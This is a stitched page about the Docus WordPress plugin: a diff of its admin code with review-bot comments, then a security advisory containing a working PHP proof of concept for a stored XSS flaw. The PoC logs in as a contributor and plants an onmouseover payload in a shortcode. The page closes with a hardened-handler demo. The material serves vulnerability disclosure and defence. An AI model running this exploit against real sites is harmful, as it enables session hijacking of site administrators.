+     */
+    public function get_plugins( $username = 'htplugins' ){
+        $transient_var = 'htrp_htplugins_list_'.$username;
+        $org_plugins_list = get_transient( $transient_var );
+
+        if ( false === $org_plugins_list ) {
+            $plugins_list_by_author = plugins_api( 'query_plugins', array( 'author' => $username, 'per_page' => 100 ) );
+            set_transient( $transient_var, $plugins_list_by_author->plugins, 1 * WEEK_IN_SECONDS );
+            $org_plugins_list = $plugins_list_by_author->plugins;
+        }
+
+        return $org_plugins_list;
+    }
+
+    /**
+     * [plugin_icon] Generate plugin icon
+     * @param  string $type plugin type
+     * @param  [array|string] $icon
+     * @return [URL] icon URL
+     */
+    public function plugin_icon( $type = 'free', $icon = '' ){
+        if( $type === 'free' ){
+            if ( ! empty( $icon['svg'] ) ) {
+                $plugin_icon_url = $icon['svg'];
+            } elseif ( ! empty( $icon['2x'] ) ) {
+                $plugin_icon_url = $icon['2x'];
+            } elseif ( ! empty( $icon['1x'] ) ) {
+                $plugin_icon_url = $icon['1x'];
+            } else {
+                $plugin_icon_url = $icon['default'];
+            }
+        }else{
+            $plugin_icon_url = $this->assets_url .'/images/extensions/'.$icon.'.png';
+        }
+
+        return $plugin_icon_url;
+
+    }
+
+    /**
+     * [active_install_count] Manage Active install count
+     * @param  [int] $active_installs
+     * @return [string]
+     */
+    public function active_install_count( $active_installs ){
+
+        if ( $active_installs >= 1000000 ) {
+            $active_installs_millions = floor( $active_installs / 1000000 );
+            $active_installs_text     = sprintf(
+                /* translators: %s: Number of millions. */
+                _nx( '%s+ Million', '%s+ Million', $active_installs_millions, 'Active plugin installations' ),
+                number_format_i18n( $active_installs_millions )
+            );
+        } elseif ( 0 === $active_installs ) {
+            $active_installs_text = _x( 'Less Than 10', 'Active plugin installations' );
+        } else {
+            $active_installs_text = number_format_i18n( $active_installs ) . '+';
+        }
+        return $active_installs_text;
+
+    }
+
+    /**
+     * [plugin_activation] Plugin activation ajax callable function
+     * @return [JSON]
+     */
+    public function plugin_activation() {
+
+        check_ajax_referer('docus_rp_nonce', 'nonce');
+
+        if ( ! current_user_can( 'install_plugins' ) || ! isset( $_POST['location'] ) || ! $_POST['location'] ) {
+            wp_send_json_error(
+                array(
+                    'success' => false,
+                    'message' => esc_html__( 'Plugin Not Found', $this->text_domain ),
+                )
+            );
+        }
+
+        $plugin_location = ( isset( $_POST['location'] ) ) ? esc_attr( $_POST['location'] ) : '';
+        $activate    = activate_plugin( $plugin_location, '', false, true );
+
+        if ( is_wp_error( $activate ) ) {
+            wp_send_json_error(
+                array(
+                    'success' => false,
+                    'message' => $activate->get_error_message(),
+                )
+            );
+        }
+
+        wp_send_json_success(
+            array(
+                'success' => true,
+                'message' => esc_html__( 'Plugin Successfully Activated', $this->text_domain ),
+            )
+        );
+
+    }
+
+
 }
 No newline at end of file
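Review bot: in plugin_activation() the nonce and `install_plugins` capability checks are in place, but `$_POST['location']` is handed to activate_plugin() after only `esc_attr()`, which is an output-escaping function rather than an input sanitizer; use `sanitize_text_field( wp_unslash( $_POST['location'] ) )` and, because the request names an arbitrary plugin path, consider accepting only the `slug/location` values this class itself renders in the tabs loop rather than any path the caller supplies. Two smaller points in the rendering loop: `data-pluginopt='<?php echo wp_json_encode( $data ); ?>'` places JSON in a single-quoted attribute without esc_attr(), so a single quote in a plugin name or location breaks out of the attribute (`esc_attr( wp_json_encode( $data ) )` is the usual form), and `if ( ! is_wp_error( $data ) )` is dead code because `$data` is the array built a few lines earlier and can never be a WP_Error. Style: `printf( __( '%s Active Installations' ), ... )` omits the text domain that every other string in the file passes.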
--- a/docus/admin/admin-init.php
+++ b/docus/admin/admin-init.php
@@ -1,446 +1,446 @@
-<?php
-
-namespace DocusAdmin;
-
-if( ! defined( 'ABSPATH' ) ) exit(); // Exit if accessed directly
-
-/**
- * Docus Dashboard Options
- */
-class Docus_Admin_Setting
-{
-
-	/**
-     * [$_instance]
-     * @var null
-    */
-    private static $_instance = null;
-
-    /**
-     * [instance] Initializes a singleton instance
-     * @return [Docus_Admin_Setting]
-    */
-    public static function instance() {
-        if ( is_null( self::$_instance ) ) {
-            self::$_instance = new self();
-        }
-        return self::$_instance;
-    }
-
-	function __construct()
-	{
-    	add_action( 'admin_init', array( $this, 'admin_init' ) );
-        add_action( 'admin_menu', array( $this, 'admin_menu' ) );
-    	add_action( 'admin_enqueue_scripts', array( $this, 'docus_admin_assets' ) );
-        $this->plugin_recommendations();
-	}
-
-	// Plugins menu Register
-    function admin_menu() {
-
-        add_menu_page(
-			__('Docus','docus'),
-			__('Docus','docus'),
-			'manage_options',
-			'docus-setting-page',
-			array($this,'plugin_page'),
-			DOCUS_PL_URL.'admin/assets/images/playlist-3.png',
-			65
-		);
-
-    }
-
-	function admin_init() {
-		$docus_options=array(
-            'apikey',
-            'play_list_id',
-            'page_layout_style',
-            'video_limit',
-    	);
-
-    	foreach ( $docus_options as $field ) {
-			register_setting( 'docus-settings-group', $field );
-		}
-	}
-
-    /**
-     * [plugin_recommendations]
-     * @return [void]
-     */
-    public function plugin_recommendations(){
-
-        $get_instance = Recommended_Plugins::instance(
-            array(
-                'text_domain'       => 'docus',
-                'parent_menu_slug'  => 'docus-setting-page',
-                'menu_capability'   => 'manage_options',
-                'menu_page_slug'    => 'docus-recommendations',
-                'priority'          => 24,
-                'assets_url'        => DOCUS_PL_URL.'admin/assets',
-                'hook_suffix'       => 'docus_page_docus-recommendations'
-            )
-        );
-
-        $get_instance->add_new_tab( array(
-
-            'title' => esc_html__( 'Recommended', 'docus' ),
-            'active' => true,
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'woolentor-addons',
-                    'location'  => 'woolentor_addons_elementor.php',
-                    'name'      => esc_html__( 'WooLentor', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-mega-for-elementor',
-                    'location'  => 'htmega_addons_elementor.php',
-                    'name'      => esc_html__( 'HT Mega', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'hashbar-wp-notification-bar',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HashBar', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-slider-for-elementor',
-                    'location'  => 'ht-slider-for-elementor.php',
-                    'name'      => esc_html__( 'HT Slider For Elementor', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-contactform',
-                    'location'  => 'contact-form-widget-elementor.php',
-                    'name'      => esc_html__( 'HT Contact Form 7', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'extensions-for-cf7',
-                    'location'  => 'extensions-for-cf7.php',
-                    'name'      => esc_html__( 'Extensions For CF7', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-wpform',
-                    'location'  => 'wpform-widget-elementor.php',
-                    'name'      => esc_html__( 'HT WPForms', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-menu-lite',
-                    'location'  => 'ht-mega-menu.php',
-                    'name'      => esc_html__( 'HT Menu', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'insert-headers-and-footers-script',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HT Script', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wp-plugin-manager',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'WP Plugin Manager', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-builder',
-                    'location'  => 'wc-builder.php',
-                    'name'      => esc_html__( 'WC Builder', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'whols',
-                    'location'  => 'whols.php',
-                    'name'      => esc_html__( 'Whols', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'just-tables',
-                    'location'  => 'just-tables.php',
-                    'name'      => esc_html__( 'JustTables', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-multi-currency',
-                    'location'  => 'wcmilticurrency.php',
-                    'name'      => esc_html__( 'Multi Currency', 'docus' )
-                )
-            )
-
-        ) );
-
-        $get_instance->add_new_tab(array(
-            'title' => esc_html__( 'You May Also Like', 'docus' ),
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'woolentor-addons-pro',
-                    'location'  => 'woolentor_addons_pro.php',
-                    'name'      => esc_html__( 'WooLentor Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/woolentor-pro-woocommerce-page-builder/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WooLentor is one of the most popular WooCommerce Elementor Addons on WordPress.org. It has been downloaded more than 672,148 times and 60,000 stores are using WooLentor plugin. Why not you?', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'htmega-pro',
-                    'location'  => 'htmega_pro.php',
-                    'name'      => esc_html__( 'HT Mega Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-mega-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HTMega is an absolute addon for elementor that includes 80+ elements & 360 Blocks with unlimited variations. HT Mega brings limitless possibilities. Embellish your site with the elements of HT Mega.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'swatchly-pro',
-                    'location'  => 'swatchly-pro.php',
-                    'name'      => esc_html__( 'Product Variation Swatches', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/swatchly-product-variation-swatches-for-woocommerce-products/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Are you getting frustrated with WooCommerce’s current way of presenting the variants for your products? Well, say goodbye to dropdowns and start showing the product variations in a whole new light with Swatchly.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'whols-pro',
-                    'location'  => 'whols-pro.php',
-                    'name'      => esc_html__( 'Whols Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/whols-woocommerce-wholesale-prices/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Whols is an outstanding WordPress plugin for WooCommerce that allows store owners to set wholesale prices for the products of their online stores. This plugin enables you to show special wholesale prices to the wholesaler. Users can easily request to become a wholesale customer by filling out a simple online registration form. Once the registration is complete, the owner of the store will be able to review the request and approve the request either manually or automatically.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'just-tables-pro',
-                    'location'  => 'just-tables-pro.php',
-                    'name'      => esc_html__( 'JustTables Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/wp/justtables/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'JustTables is an incredible WordPress plugin that lets you showcase all your WooCommerce products in a sortable and filterable table view. It allows your customers to easily navigate through different attributes of the products and compare them on a single page. This plugin will be of great help if you are looking for an easy solution that increases the chances of landing a sale on your online store.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'multicurrencypro',
-                    'location'  => 'multicurrencypro.php',
-                    'name'      => esc_html__( 'Multi Currency Pro for WooCommerce', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/multi-currency-pro-for-woocommerce/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Multi-Currency Pro for WooCommerce is a prominent currency switcher plugin for WooCommerce. This plugin allows your website or online store visitors to switch to their preferred currency or their country’s currency.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'cf7-extensions-pro',
-                    'location'  => 'cf7-extensions-pro.php',
-                    'name'      => esc_html__( 'Extensions For CF7 Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/cf7-extensions/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Contact Form7 Extensions plugin is a fantastic WordPress plugin that enriches the functionalities of Contact Form 7.This all-in-one WordPress plugin will help you turn any contact page into a well-organized, engaging tool for communicating with your website visitors by providing tons of advanced features like drag and drop file upload, repeater field, trigger error for already submitted forms, popup form response, country flags and dial codes with a telephone input field and acceptance field, etc. in addition to its basic features.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'hashbar-pro',
-                    'location'  => 'init.php',
-                    'name'      => esc_html__( 'HashBar Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/wordpress-notification-bar-plugin/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HashBar is a WordPress Notification / Alert / Offer Bar plugin which allows you to create unlimited notification bars to notify your customers. This plugin has option to show email subscription form (sometimes it increases up to 500% email subscriber), Offer text and buttons about your promotions. This plugin has the options to add unlimited background colors and images to make your notification bar more professional.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'wp-plugin-manager-pro',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'WP Plugin Manager Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/wp-plugin-manager-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WP Plugin Manager Pro is a specialized WordPress Plugin that helps you to deactivate unnecessary WordPress Plugins page wise and boosts the speed of your WordPress site to improve the overall site performance.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-script-pro',
-                    'location'  => 'plugin-main.php',
-                    'name'      => esc_html__( 'HT Script Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/insert-headers-and-footers-code-ht-script/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'Insert Headers and Footers Code allows you to insert Google Analytics, Facebook Pixel, custom CSS, custom HTML, JavaScript code to your website header and footer without modifying your theme code.This plugin has the option to add any custom code to your theme in one place, no need to edit the theme code. It will save your time and remove the hassle for the theme update.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-menu',
-                    'location'  => 'ht-mega-menu.php',
-                    'name'      => esc_html__( 'HT Menu Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-menu-pro/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'WordPress Mega Menu Builder for Elementor', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-slider-addons-pro',
-                    'location'  => 'ht-slider-addons-pro.php',
-                    'name'      => esc_html__( 'HT Slider Pro For Elementor', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-slider-pro-for-elementor/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'HT Slider Pro is a plugin to create a slider for WordPress websites easily using the Elementor page builder. 80+ prebuild slides/templates are included in this plugin. There is the option to create a post slider, WooCommerce product slider, Video slider, image slider, etc. Fullscreen, full width and box layout option are included.', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-google-place-review',
-                    'location'  => 'ht-google-place-review.php',
-                    'name'      => esc_html__( 'Google Place Review', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/google-place-review-plugin-for-wordpress/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( 'If you are searching for a modern and excellent google places review WordPress plugin to showcase reviews from Google Maps and strengthen trust between you and your site visitors, look no further than HT Google Place Review', 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'was-this-helpful',
-                    'location'  => 'was-this-helpful.php',
-                    'name'      => esc_html__( 'Was This Helpful?', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/was-this-helpful/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "Was this helpful? is a WordPress plugin that allows you to take visitors' feedback on your post/pages or any article. A visitor can share his feedback by like/dislike/yes/no", 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'ht-click-to-call',
-                    'location'  => 'ht-click-to-call.php',
-                    'name'      => esc_html__( 'HT Click To Call', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/ht-click-to-call/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "HT – Click to Call is a lightweight WordPress plugin that allows you to add a floating click to call button on your website. It will offer your website visitors an opportunity to call your business immediately at the right moment, especially when they are interested in your products or services and seeking more information.", 'docus' ),
-                ),
-
-                array(
-                    'slug'      => 'docus-pro',
-                    'location'  => 'docus-pro.php',
-                    'name'      => esc_html__( 'Docus Pro', 'docus' ),
-                    'link'      => 'https://hasthemes.com/plugins/docus-pro-youtube-video-playlist/',
-                    'author_link'=> 'https://hasthemes.com/',
-                    'description'=> esc_html__( "Embedding a YouTube playlist into your website plays a vital role to curate your content into several categories and make your web content more engaging and popular by keeping the visitors on your website for a longer period.", 'docus' ),
-                ),
-
-            )
-        ));
-
-        $get_instance->add_new_tab(array(
-            'title' => esc_html__( 'Others', 'docus' ),
-            'plugins' => array(
-
-                array(
-                    'slug'      => 'really-simple-google-tag-manager',
-                    'location'  => 'really-simple-google-tag-manager.php',
-                    'name'      => esc_html__( 'Really Simple Google Tag Manager', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-instagram',
-                    'location'  => 'ht-instagram.php',
-                    'name'      => esc_html__( 'HT Feed', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'faster-youtube-embed',
-                    'location'  => 'faster-youtube-embed.php',
-                    'name'      => esc_html__( 'Faster YouTube Embed', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'wc-sales-notification',
-                    'location'  => 'wc-sales-notification.php',
-                    'name'      => esc_html__( 'WC Sales Notification', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'preview-link-generator',
-                    'location'  => 'preview-link-generator.php',
-                    'name'      => esc_html__( 'Preview Link Generator', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'quickswish',
-                    'location'  => 'quickswish.php',
-                    'name'      => esc_html__( 'QuickSwish', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'data-captia',
-                    'location'  => 'data-captia.php',
-                    'name'      => esc_html__( 'DataCaptia', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'coupon-zen',
-                    'location'  => 'coupon-zen.php',
-                    'name'      => esc_html__( 'Coupon Zen', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'sirve',
-                    'location'  => 'sirve.php',
-                    'name'      => esc_html__( 'Sirve – Simple Directory Listing', 'docus' )
-                ),
-
-                array(
-                    'slug'      => 'ht-social-share',
-                    'location'  => 'ht-social-share.php',
-                    'name'      => esc_html__( 'HT Social Share', 'docus' )
-                ),
-
-            )
-        ));
-
-    }
-
-	function docus_admin_assets($hook){
-		if($hook === 'toplevel_page_docus-setting-page'){
-			//enque stype
-			wp_enqueue_style( 'docus-admin-style', DOCUS_PL_URL.'admin/assets/css/admin-style.css');
-            wp_enqueue_script( 'docus-admin', DOCUS_PL_URL.'admin/assets/js/admin.js', array('jquery'),'1.0.0', true);
-		}
-	}
-
-	function plugin_page() {
-
-        ?>
-            <h2 class="nav-tab-wrapper">
-                <a href="#docus-tab-1" id="htg-general-tab" class="htg-nav nav-tab"><?php esc_html_e('General', 'docus')?></a>
-                <a href="#docus-tab-2" id="htg-style-tab" class="htg-nav nav-tab"><?php esc_html_e('Shortcode', 'docus')?></a>
-            </h2>
-        <?php
-        echo '<div id="docus-tab-1" class="docus-tab-group">';
-            
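Review bot: the hunk header `@@ -1,446 +1,446 @@` removes and re-adds every line of admin-init.php with identical counts, and only the removed side is visible here, so the functional change cannot be reviewed from this view; a whole-file hunk like this usually comes from line-ending or indentation normalisation (the file mixes tabs and spaces, for example around `function __construct()` and `admin_init()`), and the diff should be regenerated with whitespace ignored (`git diff -w`) so the real change stands out. On the removed side, `register_setting( 'docus-settings-group', $field )` registers `apikey`, `play_list_id`, `page_layout_style` and `video_limit` with no `sanitize_callback`, so whatever the settings form submits is stored verbatim; confirm that the added side passes `array( 'sanitize_callback' => ... )` (for instance `sanitize_text_field` for the API key and playlist ID, `absint` for `video_limit`), since values stored here are later rendered by the plugin.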

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1888 - Docus <= 1.0.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes

/**
 * Proof of Concept for CVE-2026-1888
 * Requires Contributor-level WordPress credentials
 * Demonstrates stored XSS via docusplaylist shortcode attributes
 *
 * Assumes the classic editor form on post-new.php. The block editor creates
 * posts through the REST API and would need an X-WP-Nonce header instead.
 */

$target_url = 'http://vulnerable-wordpress-site.com';
$username   = 'contributor_user';
$password   = 'contributor_password';

// Payload to inject - basic alert demonstrating XSS.
// WordPress's shortcode attribute parser will not let a double-quoted value
// contain a double quote, so the break-out uses single quotes. This assumes
// the handler echoes the value inside a single-quoted HTML attribute; adjust
// the quoting to match how the handler actually renders the attribute.
$xss_payload = "' onmouseover='alert(document.domain)";

// One cURL session with a cookie jar so the WordPress auth cookies persist
$cookie_jar = tempnam(sys_get_temp_dir(), 'wp-poc-');
$ch = curl_init();
curl_setopt_array($ch, array(
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_COOKIEJAR      => $cookie_jar,
    CURLOPT_COOKIEFILE     => $cookie_jar,
));

// Step 1: Authenticate to WordPress
$login_url   = $target_url . '/wp-login.php';
$post_fields = array(
    'log'         => $username,
    'pwd'         => $password,
    'wp-submit'   => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie'  => '1',
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
$response = curl_exec($ch);

// A successful login is redirected to redirect_to; a failed one stays on wp-login.php
if ($response === false || strpos(curl_getinfo($ch, CURLINFO_EFFECTIVE_URL), '/wp-admin/') === false) {
    die("Login failed. Check credentials.\n");
}

// Step 2: Open the "Add New Post" form. WordPress pre-creates an auto-draft
// and embeds its post_ID and the update-post nonce as hidden form fields.
$new_post_url = $target_url . '/wp-admin/post-new.php';
curl_setopt($ch, CURLOPT_URL, $new_post_url);
curl_setopt($ch, CURLOPT_HTTPGET, true);
$response = curl_exec($ch);

// wp_nonce_field() emits: <input type="hidden" id="_wpnonce" name="_wpnonce" value="..." />
if (!preg_match('/name="_wpnonce"\s+value="([0-9a-f]+)"/', $response, $m)) {
    die("No update-post nonce found: not logged in, or the block editor is active.\n");
}
$nonce = $m[1];
if (!preg_match('/name="post_ID"\s+value="(\d+)"/', $response, $m)) {
    die("No post_ID found in the new-post form.\n");
}
$post_id = $m[1];

// Step 3: Save the auto-draft with the malicious shortcode as its content.
// The shortcode is plain text, so the KSES filtering applied to users without
// unfiltered_html does not strip it. A Contributor cannot publish: WordPress
// downgrades 'publish' to 'pending', and the payload fires when an Editor or
// Administrator previews the pending post (or wherever the shortcode renders).
$submit_url = $target_url . '/wp-admin/post.php';
$post_data  = array(
    'action'           => 'editpost',
    'post_ID'          => $post_id,
    'post_title'       => 'Test Post with XSS',
    'content'          => '[docusplaylist id="' . $xss_payload . '"]',
    'publish'          => 'Publish',
    'post_type'        => 'post',
    '_wpnonce'         => $nonce,
    '_wp_http_referer' => $new_post_url,
);

curl_setopt($ch, CURLOPT_URL, $submit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
$response = curl_exec($ch);

// Check for success: post.php redirects back to the editor with a status notice.
// "Post submitted." is what a Contributor sees; "Post published." needs publish_posts.
if (preg_match('/Post (submitted|published)\./', $response, $m)) {
    echo "Exploit successful! XSS payload stored in post {$post_id} ({$m[0]}).\n";
    echo "Preview or view the post as a higher-privileged user to trigger the payload.\n";
} else {
    echo "Exploit failed. Check credentials and permissions.\n";
}

curl_close($ch);
unlink($cookie_jar);
?>
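The root cause described above is a shortcode handler that drops attribute values into HTML without an allow-list or escaping. The following is an added illustration, not the Docus plugin's source (the handler itself is not reproduced on this page): a vulnerable handler next to a hardened one, fed the same parsed attributes. It assumes the handler echoes the id inside a single-quoted HTML attribute, and the WordPress helpers esc_attr(), sanitize_html_class() and shortcode_atts() are polyfilled in simplified form so the file runs under plain `php`; inside WordPress the real functions are used instead. demo_parse_atts() is a simplified copy of how shortcode_parse_atts() splits attributes, included to show why the break-out payload has to use the other quote character.

```php
<?php
// Illustrative handler pair, not the Docus plugin's code. The WordPress helpers
// below are simplified stand-ins so this runs outside WordPress.

if ( ! function_exists( 'esc_attr' ) ) {
    // Simplified esc_attr(): encode both quote styles for an HTML attribute context.
    function esc_attr( $text ) {
        return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8' );
    }
}
if ( ! function_exists( 'sanitize_html_class' ) ) {
    // Simplified sanitize_html_class(): only [A-Za-z0-9_-] survive, none of which
    // can close an attribute or start a new one.
    function sanitize_html_class( $class, $fallback = '' ) {
        $clean = preg_replace( '/[^A-Za-z0-9_-]/', '', (string) $class );
        return ( '' === $clean ) ? $fallback : $clean;
    }
}
if ( ! function_exists( 'shortcode_atts' ) ) {
    // Simplified shortcode_atts(): keep only the keys the handler declares.
    function shortcode_atts( $pairs, $atts ) {
        $out = array();
        foreach ( $pairs as $name => $default ) {
            $out[ $name ] = array_key_exists( $name, $atts ) ? $atts[ $name ] : $default;
        }
        return $out;
    }
}

// Simplified copy of how WordPress's shortcode_parse_atts() splits name="value",
// name='value' and name=value pairs. A value quoted with one quote character
// cannot contain that character, so a break-out has to use the other one.
function demo_parse_atts( $text ) {
    $atts = array();
    $re   = '/([\w-]+)\s*=\s*"([^"]*)"(?:\s|$)'
          . '|([\w-]+)\s*=\s*\'([^\']*)\'(?:\s|$)'
          . '|([\w-]+)\s*=\s*([^\s\'"]+)(?:\s|$)/';
    preg_match_all( $re, trim( $text ), $matches, PREG_SET_ORDER );
    foreach ( $matches as $m ) {
        if ( isset( $m[1] ) && '' !== $m[1] ) {
            $atts[ strtolower( $m[1] ) ] = $m[2];
        } elseif ( isset( $m[3] ) && '' !== $m[3] ) {
            $atts[ strtolower( $m[3] ) ] = $m[4];
        } elseif ( isset( $m[5] ) && '' !== $m[5] ) {
            $atts[ strtolower( $m[5] ) ] = $m[6];
        }
    }
    return $atts;
}

// Vulnerable pattern: attribute values are interpolated straight into the markup.
function demo_vulnerable_render( array $atts ) {
    $id    = isset( $atts['id'] ) ? $atts['id'] : '';
    $class = isset( $atts['class'] ) ? $atts['class'] : 'docus-playlist';
    return "<div id='{$id}' class='{$class}'></div>";
}

// Hardened pattern: allow-list the attributes, constrain their shape, escape on output.
function demo_hardened_render( array $atts ) {
    $a     = shortcode_atts( array( 'id' => '', 'class' => 'docus-playlist' ), $atts );
    $id    = esc_attr( $a['id'] );                                // quotes become entities
    $class = sanitize_html_class( $a['class'], 'docus-playlist' ); // no quote can survive
    return "<div id='{$id}' class='{$class}'></div>";
}

// Constructed post content: the id value carries the single-quote break-out from
// the advisory, and the class value tries the same trick through a second attribute.
$content = "[docusplaylist id=\"' onmouseover='alert(document.domain)\" class=\"x' onclick='alert(1)\"]";
preg_match( '/\[docusplaylist([^\]]*)\]/', $content, $tag );
$atts = demo_parse_atts( $tag[1] );

echo "parsed atts: ", json_encode( $atts ), "\n";
echo "vulnerable:  ", demo_vulnerable_render( $atts ), "\n";
echo "hardened:    ", demo_hardened_render( $atts ), "\n";
```

Run it with `php demo.php`. The parsed id value is `' onmouseover='alert(document.domain)`, so the vulnerable handler emits a div whose id attribute closes early and gains an onmouseover handler; the hardened handler turns both quotes into entities and reduces the class value to its alphanumeric characters, so the markup stays a single attribute each. Inside WordPress the real esc_attr() is more thorough (it avoids double-encoding existing entities), and the same rule applies to every attribute the handler echoes, including any it accepts beyond id and class.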
